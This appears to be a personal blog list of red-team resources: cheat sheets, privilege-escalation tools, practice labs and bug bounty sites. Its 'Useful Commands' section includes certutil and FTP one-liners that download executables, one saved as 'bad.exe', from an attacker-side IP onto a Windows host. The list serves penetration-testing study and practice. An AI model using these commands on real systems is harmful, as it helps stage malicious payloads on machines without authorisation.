This is just a list of my favorite resources for doing red team stuff. It’s not a complete list I’m sure. I’ll keep adding to it over time. If you have something you think should be on here, please hit me up @DotNetRussell
Cheat Sheets
- Red-Team-Tactics Cheat Sheets and Commands (possibly the best collection ever)
- Pentest Monkey – Reverse Shell Cheat Sheet
- NetSec – Spawning TTY Shell Cheat Sheet
- Tmux – Tmux Cheat Sheet
- g0tmi1k – Linux Privilege Escalation Cheat Sheet
- swisskyrepo – Windows Privilege Escalation Cheat Sheet
- Null-Byte – File Upload Filter Bypass Cheat Sheet
- Exploit DB – File Upload Filter Bypass Cheat Sheet
- WADComs – Windows Privilege Cheat Sheets
- Setup Pure FTPd On Linux and Use Windows FTP to Fetch Files
- Red Team Infrastructure – Useful commands and tips
- Hack Tricks – Windows Priv Esc Via Privileges
Encoder/Decoder
- AppDevTools – Encode/Decode all the things
- CyberChef – Magic Decoder
Tools
- RebootUser – LinEnum.sh (Linux Privilege Escalation)
- Anon-Exploiter – SUID3NUM (Linux Privilege Escalation)
- DotNetRussell – ShinobiShell (Experimental Linux Privilege Escalation Client/Server Shell)
- Exploit DB – All the Exploits 🙂
- Windows Exploit Suggester (requires python 2)
- pip install xlrd==1.2.0
- Compile Windows Exploits on Linux
- apt-get install mingw-w64
- Auto Recon – OSCP safe enumeration tool
Useful Commands
- Download Files on Windows
- certutil.exe -urlcache -f http://10.0.0.5/40564.exe bad.exe
- Download files on Windows
- (echo open 10.10.14.20&echo <user>&echo <password>&echo binary&echo get File.exe&echo bye) > ftp.txt & ftp -s:ftp.txt
- Install pip3
- sudo apt-get -y install python3-pip
Penetration Testing Labs
- VulnHub – Vulnerable Virtual Machines for Download
- HackTheBox – Vulnerable Lab Environment
- TryHackMe – Training and Challenges
Bug Bounties
- HackerOne – Public and Private Bug Bounty Programs
- BugCrowd – Public and Private Bug Bounty Programs
Other
- Digital Ocean – VPS Provider
- CryptoStorm.is – VPN Provider
- Virtual Box – Virtual Machine Host Software
- HackTricks – Cheat Sheets, Tips, Checklists and more